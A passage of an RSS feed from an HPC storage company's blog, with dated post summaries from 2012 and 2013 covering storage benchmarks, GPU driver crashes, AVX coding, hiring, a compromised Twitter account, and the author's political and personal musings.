      <guid>https://blog.scalability.org/2013/02/walkingspam-that-you-cannot-easily-filter-electronically/</guid>
      <description>[update] Ok, this was amusing. An SEO group commented with a link back to their SEO site. Our spam filter caught it. (/shakes head) We had the most &amp;hellip; well &amp;hellip; interesting event happen at the office a few days ago. You know how, in your spam filtered email you get hundreds or thousands of items with wording something like this: If you were my Client you would be # 1 on Google or I can make you # 1 on Google in 3 Weeks.</description>
    </item>
    
    <item>
      <title>A lightly ARMed JackRabbit 60 bay unit</title>
      <link>https://blog.scalability.org/2013/02/a-lightly-armed-jackrabbit-60-bay-unit/</link>
      <pubDate>Wed, 13 Feb 2013 23:35:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/a-lightly-armed-jackrabbit-60-bay-unit/</guid>
      <description>This is 8x nodes (2x EnergyCards) of Calxeda goodness. We expect to be able to show off (and demo!) a live, more heavily ARMed unit shortly.
[ ](/images/ARMed_JackRabbit.jpg)</description>
    </item>
    
    <item>
      <title>Putting a 60 bay JackRabbit through some basic tests</title>
      <link>https://blog.scalability.org/2013/02/putting-a-60-bay-jackrabbit-through-some-basic-tests/</link>
      <pubDate>Wed, 13 Feb 2013 23:09:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/putting-a-60-bay-jackrabbit-through-some-basic-tests/</guid>
      <description>Basic (conservative) configuration of the day job&#39;s high performance tightly coupled storage system, no SSDs (apart from the OS drives). RAID6 LUNs, no RAID0&amp;rsquo;s. This is spinning rust folks. Nothing but spinning rust. In a realistic configuration. And no, we haven&amp;rsquo;t yet begun to tune this. Streaming writes, 1 thread per LUN:
Run status group 0 (all jobs): WRITE: io=1279.5GB, aggrb=5944.6MB/s, minb=5944.6MB/s, maxb=5944.6MB/s, mint=220405msec, maxt=220405msec  5.9 GB/s sustained writes for this case.</description>
    </item>
    
    <item>
      <title>karma?</title>
      <link>https://blog.scalability.org/2013/02/karma/</link>
      <pubDate>Mon, 11 Feb 2013 22:38:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/karma/</guid>
      <description>On this blog, I&amp;rsquo;ve pointed out the failings of many others. I&amp;rsquo;ve hinted at having to take ownership of others&amp;rsquo; failures, as the customer sees us, and not the people behind us (often messing with us). Our job is, among many other things, to hide that silliness away from them so they can focus upon their issues. This is not to say we/I don&amp;rsquo;t mess up. Most of the time it&amp;rsquo;s minor.</description>
    </item>
    
    <item>
      <title>Getting out of Dodge</title>
      <link>https://blog.scalability.org/2013/02/getting-out-of-dodge/</link>
      <pubDate>Sat, 09 Feb 2013 18:58:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/getting-out-of-dodge/</guid>
      <description>Thursday morning, the weather prediction was for 1-3 inches of snow in Secaucus, NJ. I&amp;rsquo;d been in a data center working the past week on bringing a system to final state. It&amp;rsquo;s done, modulo some cosmetic and minor functional issues that should not impede usage. So we accomplished this mission, though I am something of a perfectionist, so we&amp;rsquo;ll be going back out in a week or so to work on the cosmetic bits.</description>
    </item>
    
    <item>
      <title>Enable changes or enforce design</title>
      <link>https://blog.scalability.org/2013/02/enable-changes-or-enforce-design/</link>
      <pubDate>Sat, 09 Feb 2013 18:37:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/enable-changes-or-enforce-design/</guid>
      <description>We have this dilemma. Customers who see our siCluster systems often like everything they see, but want &amp;ldquo;minor&amp;rdquo; changes. And we evaluate the changes they want for impact, describe it, and suggest a go/no-go based upon many aspects. Including supportability, stability, etc. We like providing this flexibility. Which gives rise to the dilemma. For us to provide supportable systems that work in a predictable manner, we have to cordon off changes.</description>
    </item>
    
    <item>
      <title>Baseline test for technical staff</title>
      <link>https://blog.scalability.org/2013/02/baseline-test-for-technical-staff/</link>
      <pubDate>Sat, 02 Feb 2013 23:26:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/baseline-test-for-technical-staff/</guid>
      <description>As usual, xkcd knocks it out of the park.
[ ](http://xkcd.com/1168/)
I talked about qualifications for our SE position. The ability to talk customers through complex vi-based configuration sessions for system files, while driving 70 mph on the freeway, is a hard requirement. Not quite a munition defusing effort, but close enough. Unfortunately in something like the game of telephone, what I originally wrote was &amp;hellip; transmogrified &amp;hellip; into something very different.</description>
    </item>
    
    <item>
      <title>A week into the ATI experiment</title>
      <link>https://blog.scalability.org/2013/02/a-week-into-the-ati-experiment/</link>
      <pubDate>Fri, 01 Feb 2013 22:26:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/02/a-week-into-the-ati-experiment/</guid>
      <description>So I was sick of the crashes in the NVidia driver. Nouveau wasn&amp;rsquo;t that good. Maybe someday it will be, but it&amp;rsquo;s really not that useful to me. So I opted for an ATI W5000 card. Initial install was rocky. The card used VESA drivers, and that was fine for initial boot. Accelerated drivers &amp;hellip; didn&amp;rsquo;t. They were slower than the VESA drivers. Window movements were jerky. It felt &amp;hellip; wrong &amp;hellip; somehow.</description>
    </item>
    
    <item>
      <title>You asked for it ... Riemann Zeta Function in javascript or node.js</title>
      <link>https://blog.scalability.org/2013/01/you-asked-for-it-riemann-zeta-function-in-javascript-or-node-js/</link>
      <pubDate>Wed, 30 Jan 2013 01:54:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/you-asked-for-it-riemann-zeta-function-in-javascript-or-node-js/</guid>
      <description>Ok, this was fun. It&amp;rsquo;s been a while since I dusted off good old rzf &amp;hellip; ok, it&amp;rsquo;s been 12-ish days &amp;hellip; but I really have been wanting to try recoding it in javascript. As you might (or might not) remember, I asked questions (a very long time ago) about quality of generated code from a few different C compilers (and eventually the same code in Fortran). I rewrote inner loops to hand optimize the compilation, and then recoded as SSE2.</description>
    </item>
    
    <item>
      <title>resonances</title>
      <link>https://blog.scalability.org/2013/01/resonances/</link>
      <pubDate>Tue, 22 Jan 2013 01:59:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/resonances/</guid>
      <description>This past December, 1 year to the day, and in fact, the very hour my wife was waking up from her surgery, we were at a Trans Siberian Orchestra concert. I like TSO quite a bit, and this had serious significance for us. Like the XKCD biopsiversary, this was our own little F-U to cancer. Not directly related to this, they played a rearranged version of a song on their newer CD.</description>
    </item>
    
    <item>
      <title>... and the positions are now, finally open ...</title>
      <link>https://blog.scalability.org/2013/01/and-the-positions-are-now-finally-open/</link>
      <pubDate>Fri, 18 Jan 2013 06:28:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/and-the-positions-are-now-finally-open/</guid>
      <description>See the Systems Engineering position here, and the System Build Technician position here. I&amp;rsquo;ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background &amp;hellip; Doug made me take out the &amp;ldquo;able to leap tall buildings in a single bound&amp;rdquo; line, as well as the &amp;ldquo;must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.</description>
    </item>
    
    <item>
      <title>Massive.  Unapologetic.  Firepower.  24GB/s from siFlash</title>
      <link>https://blog.scalability.org/2013/01/massive-unapologetic-firepower-24gbs-from-siflash/</link>
      <pubDate>Wed, 16 Jan 2013 15:11:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/massive-unapologetic-firepower-24gbs-from-siflash/</guid>
      <description>Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache &amp;hellip;
[root@siFlash ~]# fio srt.fio
...
Run status group 0 (all jobs):
  READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec
This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).</description>
    </item>
    
    <item>
      <title>Doing something I&#39;ve not done in a long time ...</title>
      <link>https://blog.scalability.org/2013/01/doing-something-ive-not-done-in-a-long-time/</link>
      <pubDate>Wed, 16 Jan 2013 14:12:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/doing-something-ive-not-done-in-a-long-time/</guid>
      <description>&amp;hellip; buying a non-NVidia GPU product. Specifically the ATI FirePro W5000 for my desktop. I need to see if this is any more stable than the NVidia GTX series products. Feedback from customers running various flavors of Fermi, Kepler, Tesla, &amp;hellip; suggests that the problem that was reported to me, that I&amp;rsquo;ve run into, is fairly widespread. It looks like a particular version of the driver (295.33) may not trip this problem.</description>
    </item>
    
    <item>
      <title>NVidia crashing x server madness</title>
      <link>https://blog.scalability.org/2013/01/nvidia-crashing-x-server-madness/</link>
      <pubDate>Tue, 15 Jan 2013 20:22:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/nvidia-crashing-x-server-madness/</guid>
      <description>I&amp;rsquo;ve been having a problem with a newly installed Mint 14 machine. A customer has been having this problem with a Scientific Linux 6.x machine. Some time after lighting up the machine, and usually after using an OpenGL application, the NVidia driver effectively hard locks, dumping error messages like this into the system logs.
[ 5444.863396] NVRM: Xid (0000:85:00): 13, 0003 00000000 00000000 00000ff4 0f000000 00000000
[ 5444.867446] NVRM: Xid (0000:85:00): 9, Channel 00000003 Instance 00000000 Intr 00000010
[ 5444.</description>
    </item>
    
    <item>
      <title>Playing with AVX</title>
      <link>https://blog.scalability.org/2013/01/playing-with-avx/</link>
      <pubDate>Tue, 15 Jan 2013 07:01:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/playing-with-avx/</guid>
      <description>I finally took some time from a busy schedule to play with AVX. I took my trusty old rzf code (Riemann Zeta function) and rewrote the time expensive inner loop in AVX primitives hooked to my C code. As a reminder, this code is a very simple sum reduction, and can be trivially parallelized. Vectorization isn&amp;rsquo;t as straightforward, and I found that compiler auto-vectorization doesn&amp;rsquo;t work well for it.</description>
    </item>
    
    <item>
      <title>Precision in languages</title>
      <link>https://blog.scalability.org/2013/01/precision-in-languages/</link>
      <pubDate>Mon, 14 Jan 2013 03:39:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/precision-in-languages/</guid>
      <description>I&amp;rsquo;ve talked about precision in previous posts quite a while ago. I had seen some interesting posts about Javascript, which suggested that it was not immune to the same issues &amp;hellip; if anything it was as problematic as most other languages, and maybe had a little less &amp;ldquo;guarding&amp;rdquo; the programmer against potential failure modes. This is not a terrible problem, I just found it amusing. Understand that I actually like Javascript.</description>
    </item>
    
    <item>
      <title>Will the US default soon?</title>
      <link>https://blog.scalability.org/2013/01/will-the-us-default-soon/</link>
      <pubDate>Mon, 14 Jan 2013 02:44:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/will-the-us-default-soon/</guid>
      <description>Quite possibly. We have a toxic mixture of overspending, insufficient revenue to cover the spending, and a borrowing limit. Several ideas have been floated over the last few weeks, including minting a $1T USD coin and depositing it in the Federal Reserve. That&amp;rsquo;s $10^12 USD, folks. This is sort of like quantitative easing, aka printing more money, but far far worse. Anyone who has ever been early into a startup and watched the value of their options get diluted with each new capital infusion knows exactly what this is.</description>
    </item>
    
    <item>
      <title>Game over, and thank you for playing</title>
      <link>https://blog.scalability.org/2013/01/game-over-and-thank-you-for-playing/</link>
      <pubDate>Sat, 12 Jan 2013 06:47:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/game-over-and-thank-you-for-playing/</guid>
      <description>Remember this?
Can we all just finally admit that not only isn&amp;rsquo;t it secure, but you can drive a semi truck through its security holes? Unfortunately, many of the kvm-over-ip stacks still use it. So you have these embedded web services things to talk to your java client, your horrifically insecure java client, to ship bytes out over the network to give you console. Can we all start demanding an end to these?</description>
    </item>
    
    <item>
      <title>Rethinking taking @americanexpress in the day job</title>
      <link>https://blog.scalability.org/2013/01/rethinking-taking-americanexpress-in-the-day-job/</link>
      <pubDate>Wed, 09 Jan 2013 19:12:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/rethinking-taking-americanexpress-in-the-day-job/</guid>
      <description>Long backstory which boils down to this: Every time a customer tries to pay with AMEX, we have to deal with a broken/borked verification system. None of our other credit card companies have issues, just AMEX. This time, they called up and questioned whether we were legitimate. Ok. They really did. I am going to start recording my calls with them, you know, for quality, and entertainment, purposes. After 5 minutes of dealing with the rep who called us, I asked for her manager.</description>
    </item>
    
    <item>
      <title>Tiburon updated with diskless CentOS 6.3 and Ubuntu 12.04 environments</title>
      <link>https://blog.scalability.org/2013/01/tiburon-updated-with-diskless-centos-6-3-and-ubuntu-12-04-environments/</link>
      <pubDate>Tue, 08 Jan 2013 23:11:39 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/tiburon-updated-with-diskless-centos-6-3-and-ubuntu-12-04-environments/</guid>
      <description>Our cluster/cloud OS environment now has modules for CentOS 6.x and Ubuntu 12.04. The latter is the LTS system. We&amp;rsquo;ve got some other tools/bits to setup for this, including working to see if we can build an ARM based PXE booting stack. We are working on making a number of cluster/cloud file system setups as absolutely painless as possible. More later.</description>
    </item>
    
    <item>
      <title>Comments on Javascript being the &#34;new&#34; Perl</title>
      <link>https://blog.scalability.org/2013/01/comments-on-javascript-being-the-new-perl/</link>
      <pubDate>Mon, 07 Jan 2013 08:06:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/comments-on-javascript-being-the-new-perl/</guid>
      <description>This has been making the rounds on Hacker News, Slashdot and others. The author&amp;rsquo;s central thesis is that Javascript has become something akin to the Swiss Army knife of cool programming, though it&amp;rsquo;s missing bits. He then compares this to Perl. He notes:
Hot is subjective, and in a very real sense, just last year, a teenager in his bedroom not only built a very cool tool, and company, but he sold it.</description>
    </item>
    
    <item>
      <title>Sad end to supercomputer in New Mexico</title>
      <link>https://blog.scalability.org/2013/01/sad-end-to-supercomputer-in-new-mexico/</link>
      <pubDate>Sun, 06 Jan 2013 16:47:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/sad-end-to-supercomputer-in-new-mexico/</guid>
      <description>I&amp;rsquo;ve written about this before, about 6 months ago. Basically, the Encanto supercomputer in New Mexico is being disassembled. The parts appear to be headed to universities in New Mexico, so it&amp;rsquo;s not a complete loss, but they will still have to pay for maintenance and power/cooling. What I had written before
may be summarized as &amp;ldquo;there are no silver bullets&amp;rdquo; to economic growth and prosperity. There are no magic stimuli that automatically return profits atop principal for investment purposes.</description>
    </item>
    
    <item>
      <title>Is 2013 the year that 10GbE finally breaks out to mass adoption?</title>
      <link>https://blog.scalability.org/2013/01/is-2013-the-year-that-10gbe-finally-breaks-out-to-mass-adoption/</link>
      <pubDate>Thu, 03 Jan 2013 19:52:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/is-2013-the-year-that-10gbe-finally-breaks-out-to-mass-adoption/</guid>
      <description>For years, we&amp;rsquo;ve been hearing how this year (for all values of this year) is the year 10GbE takes off. I&amp;rsquo;ve commented on this a number of times, from the context of 10GbE breaking out in clusters, 10GbE killing off infiniband, etc. Looking back, these comments extend 6+ years into the past. The point I have always argued as being the most important, has been cost per port. Well, the technical press noted this today.</description>
    </item>
    
    <item>
      <title>More M&amp;A ... Nexsan snarfed by ... Imation?</title>
      <link>https://blog.scalability.org/2013/01/more-ma-nexsan-snarfed-by-imation/</link>
      <pubDate>Thu, 03 Jan 2013 04:20:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/more-ma-nexsan-snarfed-by-imation/</guid>
      <description>Ok, I didn&amp;rsquo;t quite see this one coming. Really. Honestly, I&amp;rsquo;ve not paid much attention to Imation in a fairly long time. I do remember tape drives and systems attached to parallel ports from them. I might even have one in my basement somewhere. Nexsan is an array vendor. For those not in the know, the array business is in a slow motion collapse, dumb arrays and associated storage targets aren&amp;rsquo;t a growth area.</description>
    </item>
    
    <item>
      <title>Nails it !!!</title>
      <link>https://blog.scalability.org/2013/01/nails-it/</link>
      <pubDate>Tue, 01 Jan 2013 22:15:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/nails-it/</guid>
      <description>Dave Barry in his usual fine form &amp;hellip; summarizes our year. The one take away should be &amp;hellip; WHAP</description>
    </item>
    
    <item>
      <title>I have joined the dark side</title>
      <link>https://blog.scalability.org/2013/01/i-have-joined-the-dark-side/</link>
      <pubDate>Tue, 01 Jan 2013 19:52:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/i-have-joined-the-dark-side/</guid>
      <description>There is now a Mac Mini on my desk. It is named neutrino. It is light. This isn&amp;rsquo;t getting rid of my Linux machine(s) by any stretch. And having used neutrino for a day and change now, I note a few things. This list might make some howl in derision, but these are my observations.
 The default fonts and font setup on Mountain Lion are execrable. I mean, really really horrible.</description>
    </item>
    
    <item>
      <title>1 January 2013 : its over the cliff we go!</title>
      <link>https://blog.scalability.org/2013/01/1-january-2013-its-over-the-cliff-we-go/</link>
      <pubDate>Tue, 01 Jan 2013 16:10:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2013/01/1-january-2013-its-over-the-cliff-we-go/</guid>
      <description>[update] This pretty much says it all. [update 2] &amp;hellip; and &amp;hellip; they &amp;hellip; fold. A bad deal, about to be voted into law. As they said, elections have consequences. Whatever happens, they (WH and Senate) now own it. No cuts, just taxes. Even though our problem is way too much spending and mis-targeted tax increases.
 Less than 10 hours into the new year for us here in GMT-5. There is some aspect of humanity whereby many view this as a hopeful time, a chance to &amp;ldquo;begin anew&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Going over the (US fiscal) cliff</title>
      <link>https://blog.scalability.org/2012/12/going-over-the-us-fiscal-cliff/</link>
      <pubDate>Thu, 27 Dec 2012 03:02:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/going-over-the-us-fiscal-cliff/</guid>
      <description>[update] There&amp;rsquo;s a good piece on the impact upon the potential negotiations and its impact upon one party. As I noted below, any deal done between 1-Jan and now will be a bad deal. The only way to get real spending cuts is to go over the cliff, so let&amp;rsquo;s do this. I don&amp;rsquo;t care about the political fortunes impact. I care about the long term impact upon the country of out of control spending.</description>
    </item>
    
    <item>
      <title>This has been another banner year for the day job</title>
      <link>https://blog.scalability.org/2012/12/this-has-been-another-banner-year-for-the-day-job/</link>
      <pubDate>Sat, 22 Dec 2012 16:42:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/this-has-been-another-banner-year-for-the-day-job/</guid>
      <description>For the last 4 years, we&amp;rsquo;ve had significant year over year growth. We set records every year. 2 years ago was a barnstormer of a year. Last year reset the definition of barnstorming for us. And this year. Yes, this year. I&amp;rsquo;ve hinted that we were following a hard/fast growth path. Some folks who read this know the trajectory we are on. 38% growth over last year. Which was 60% growth over the year before.</description>
    </item>
    
    <item>
      <title>OT: Helping a good cause</title>
      <link>https://blog.scalability.org/2012/12/ot-helping-a-good-cause/</link>
      <pubDate>Sat, 22 Dec 2012 15:42:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/ot-helping-a-good-cause/</guid>
      <description>A few months ago, we had a new addition to our family. This is Captain, and he is what is called a rescue dog. The organization that rescued him doesn&amp;rsquo;t have that as their primary mission; they build shelters and provide food for dogs who are chained up outside. Our Captain was one such. He was badly abused, and 4 months later, has major trust issues, and bad nightmares. He has recovered from the physical abuse.</description>
    </item>
    
    <item>
      <title>SC12 video</title>
      <link>https://blog.scalability.org/2012/12/sc12-video/</link>
      <pubDate>Thu, 20 Dec 2012 02:21:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/sc12-video/</guid>
      <description>If you haven&amp;rsquo;t figured it out, I&amp;rsquo;ve been busy. This is the very good sort of busy. Rich at InsideHPC.com (you read this, right? Regularly? Right? You should if you don&amp;rsquo;t) did a whole set of interviews at SC12. There&amp;rsquo;s some very cool stuff in them. Here&amp;rsquo;s ours. I&amp;rsquo;ll tell you the funny stuff at the end.
So this is like 8:30am. I&amp;rsquo;ve not had my coffee, so my brain is stuck in POST mode, and I am subject to race conditions (mouth stumbling ahead of single brain cell that might be awake).</description>
    </item>
    
    <item>
      <title>sparse file WTFs on Linux</title>
      <link>https://blog.scalability.org/2012/12/sparse-file-wtfs-on-linux/</link>
      <pubDate>Wed, 19 Dec 2012 21:41:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/sparse-file-wtfs-on-linux/</guid>
      <description>Create a big file &amp;hellip;
[root@jr5-lab test]# dd if=/dev/zero of=big.file.1 bs=1 count=1 seek=1P
1+0 records in
1+0 records out
1 byte (1 B) copied, 0.000159797 seconds, 6.3 kB/s
[root@jr5-lab test]# ls -alF
total 4
drwxrwxrwx 2 root root 23 Dec 19 17:33 ./
drwxr-xr-x 6 root root 73 Nov 6 11:07 ../
-rw-r--r-- 1 root root 1125899906842625 Dec 19 17:33 big.file.1
[root@jr5-lab test]# ls -alFh
total 4.0K
drwxrwxrwx 2 root root 23 Dec 19 17:33 .</description>
    </item>
    
    <item>
      <title>Microsoft OSes will likely be losing OpenMPI support</title>
      <link>https://blog.scalability.org/2012/12/microsoft-oses-will-likely-be-losing-openmpi-support/</link>
      <pubDate>Tue, 18 Dec 2012 16:13:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/microsoft-oses-will-likely-be-losing-openmpi-support/</guid>
      <description>I&amp;rsquo;d been holding off on posting anything on this for a while to see if any group steps up to support it. It looks like this is simply not happening. One shouldn&amp;rsquo;t infer anything about the Microsoft platforms w.r.t. HPC as a result of this one case. However, in light of the absorption of the HPC group into the larger server group, and other reorganizations, it&amp;rsquo;s hard to draw a positive conclusion about the longevity of Microsoft&amp;rsquo;s HPC efforts.</description>
    </item>
    
    <item>
      <title>The downside to social media</title>
      <link>https://blog.scalability.org/2012/12/the-downside-to-social-media/</link>
      <pubDate>Mon, 17 Dec 2012 06:26:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/the-downside-to-social-media/</guid>
      <description>&amp;hellip; there are SOOO MANY things to update, pay attention to &amp;hellip; Yeah, it&amp;rsquo;s heaven for those of us blessed with ADHD (squirrel!), but it takes away time from important things. And of course, there is at least a little irony in blogging about this and having it auto-tweeted. The world doesn&amp;rsquo;t need more social media.</description>
    </item>
    
    <item>
      <title>Wondering aloud</title>
      <link>https://blog.scalability.org/2012/12/wondering-aloud-2/</link>
      <pubDate>Mon, 17 Dec 2012 06:06:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/wondering-aloud-2/</guid>
      <description>Call this a hypothesis based upon observation. It&amp;rsquo;s harder for smart people to admit they are incorrect about something, than it might be for the population as a whole. My rationale works like this &amp;hellip; the smarter you are, the more defensive you are of that &amp;lsquo;status&amp;rsquo; if you will, and so you tend to act in a way to reinforce prior decisions, regardless of their actual (quantifiable) correctness. That is, you are more afraid of the consequences of admitting to being wrong, as compared to actually being wrong.</description>
    </item>
    
    <item>
      <title>Its getting near time for the obligatory Led Zeppelin reference ...</title>
      <link>https://blog.scalability.org/2012/12/its-getting-near-time-for-the-obligatory-led-zeppelin-reference/</link>
      <pubDate>Sun, 16 Dec 2012 17:09:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/its-getting-near-time-for-the-obligatory-led-zeppelin-reference/</guid>
      <description>Last year, it was a What is and what should never be. I took some liberal artistic license with the title, and altered its meaning. But the song itself is about thinking about a brighter future.
My family was just getting started down the path of a cancer diagnosis and treatment. My wife was diagnosed, and without explaining precisely why, the doctors urged us to move rapidly. I think we understand now, why they did.</description>
    </item>
    
    <item>
      <title>That was the easiest update ... evuh ...</title>
      <link>https://blog.scalability.org/2012/12/that-was-the-easiest-update-evuh/</link>
      <pubDate>Sun, 16 Dec 2012 15:52:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/that-was-the-easiest-update-evuh/</guid>
      <description>Wordpress before 3.5 to Wordpress 3.5. 1 button click. 1. Count em. 1. Uno. No dos. I am going to take that lesson to heart. One button.</description>
    </item>
    
    <item>
      <title>Updated DeltaV4 quick benchies</title>
      <link>https://blog.scalability.org/2012/12/updated-deltav4-quick-benchies/</link>
      <pubDate>Tue, 11 Dec 2012 05:48:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/updated-deltav4-quick-benchies/</guid>
      <description>Streaming reads and writes. Far beyond memory/cache/&amp;hellip; all spinning disk. Remember, this is our &amp;ldquo;slow&amp;rdquo; storage.
[root@dv4-1 ~]# df -h /data
Filesystem Size Used Avail Use% Mounted on
/dev/md2 55T 65G 55T 1% /data
Run status group 0 (all jobs):
  WRITE: io=65505MB, aggrb=1467.7MB/s, minb=1467.7MB/s, maxb=1467.7MB/s, mint=44633msec, maxt=44633msec
Run status group 0 (all jobs):
  READ: io=65412MB, aggrb=1814.5MB/s, minb=1814.5MB/s, maxb=1814.5MB/s, mint=36050msec, maxt=36050msec</description>
    </item>
    
    <item>
      <title>I am guessing they don&#39;t get it ...</title>
      <link>https://blog.scalability.org/2012/12/i-am-guessing-they-dont-get-it/</link>
      <pubDate>Mon, 10 Dec 2012 19:26:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/i-am-guessing-they-dont-get-it/</guid>
      <description>I wrote this some time ago.
This is even more true this year than last. So when people call me up and try to tell me of the glamour of working for another company, they need to take this into consideration. But they don&amp;rsquo;t. So they call all the extensions on our phone. And leave messages for everyone. Um &amp;hellip; yeah. We are growing, much faster than I had anticipated. We are actually on a real live hockey stick revenue curve.</description>
    </item>
    
    <item>
      <title>Our cloudy future</title>
      <link>https://blog.scalability.org/2012/12/our-cloudy-future/</link>
      <pubDate>Sun, 02 Dec 2012 13:46:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/our-cloudy-future/</guid>
      <description>So I just dealt with a hack on the @sijoe twitter account. And I went through a process of re-locking everything down. What occurs to me, is that this is our cloudy future. Where resources could be effectively stolen from us, say CPU cycles and storage, not merely hacking useless social media sites, by fairly determined hacking groups. Think about this for a moment. You have a large allocation on EC2 for some reason, and your account gets hacked.</description>
    </item>
    
    <item>
      <title>Well, that was fun</title>
      <link>https://blog.scalability.org/2012/12/well-that-was-fun/</link>
      <pubDate>Sun, 02 Dec 2012 12:30:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/well-that-was-fun/</guid>
      <description>Somehow/somewhere, the @sijoe twitter account was compromised, and a bad tweet generated. I deleted the tweet. Then revoked all access to twitter from all accounts. Then made sure I&amp;rsquo;ve got two factor authentication up everywhere possible. Then changed all passwords on all accounts. Are we having fun yet? Somehow, I have a sense that this is our computational future. I&amp;rsquo;ll elaborate on this shortly. Let me finish hooking up the newly re-secured bits to each other (well, a more limited version of this &amp;hellip;) And no, I wasn&amp;rsquo;t able to identify the culprit vector.</description>
    </item>
    
    <item>
      <title>What we&#39;ve been working on for the past several months</title>
      <link>https://blog.scalability.org/2012/12/what-weve-been-working-on-for-the-past-several-months/</link>
      <pubDate>Sun, 02 Dec 2012 00:36:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/12/what-weve-been-working-on-for-the-past-several-months/</guid>
      <description>&amp;hellip; I still can&amp;rsquo;t talk about it publicly, until everything is live, and I get the OK. But it is awesome, and its a pleasure to work with the large extended team we are working with. And yes, this is killing me. I love to talk about cool stuff.</description>
    </item>
    
    <item>
      <title>I can&#39;t believe its been one year since I wrote this</title>
      <link>https://blog.scalability.org/2012/11/i-cant-believe-its-been-one-year-since-i-wrote-this/</link>
      <pubDate>Sat, 01 Dec 2012 01:28:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/i-cant-believe-its-been-one-year-since-i-wrote-this/</guid>
      <description>This post.
That was written in the late evening of the 29th of November 2011. Today is the 1 year anniversary of that visit. Chris Samuel (@chris_bloke) and his wife went through a similar event somewhat before we did. And he pointed out this XKCD to everyone on his twitter feed. We got our surgical slot quickly, I believe we were given priority. Not sure why, but the post-operative analysis indicated that the cancer had broken out of the duct, and was growing rapidly.</description>
    </item>
    
    <item>
      <title>Initial results for 60 bay unit running a software RAID</title>
      <link>https://blog.scalability.org/2012/11/initial-results-for-60-bay-unit-running-a-software-raid/</link>
      <pubDate>Tue, 27 Nov 2012 04:30:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/initial-results-for-60-bay-unit-running-a-software-raid/</guid>
      <description>Our new JackRabbit tightly coupled storage and computing unit is on the test track, and about to go out the door to a customer. Need a few minutes with it, after quick tuning to generate some performance data. This is a single 4U server unit with 1/4 PB within it. Streaming 1TB from disk. This is using our tuned software RAID6. Our hardware accelerated RAID results will be generated later in the next batch of tests with new units we are building.</description>
    </item>
    
    <item>
      <title>Learning limits of Linux distribution infrastructure</title>
      <link>https://blog.scalability.org/2012/11/learning-limits-of-linux-distribution-infrastructure/</link>
      <pubDate>Mon, 26 Nov 2012 13:48:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/learning-limits-of-linux-distribution-infrastructure/</guid>
      <description>It&amp;rsquo;s only when you stress a distribution infrastructure that you truly see its limits. And as often as not, the fail winds up being widespread. Our new 60 bay JackRabbit unit with CentOS 6.3 on it &amp;hellip; and this is not a bash at CentOS, they do a great job rebuilding the Red Hat distribution without the copyrighted bits &amp;hellip; has a number of software RAID elements on it. 9 in the current test.</description>
    </item>
    
    <item>
      <title>ICL (IPMI Console Logger) update</title>
      <link>https://blog.scalability.org/2012/11/icl-ipmi-console-logger-update/</link>
      <pubDate>Mon, 19 Nov 2012 01:49:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/icl-ipmi-console-logger-update/</guid>
      <description>Ok, it took me forever to get this done. But I&amp;rsquo;ve had inquiries from a large number of people/companies, so here goes: Have a looksy at the repo here This is the older code, with a single host at a time (plumbing is for many many hosts at once), with no triggers. That code is about a week away (I don&amp;rsquo;t like committing broken code). For what it&amp;rsquo;s worth, this is going to be used at scale in one of our projects.</description>
    </item>
    
    <item>
      <title>Controversy in the kernel</title>
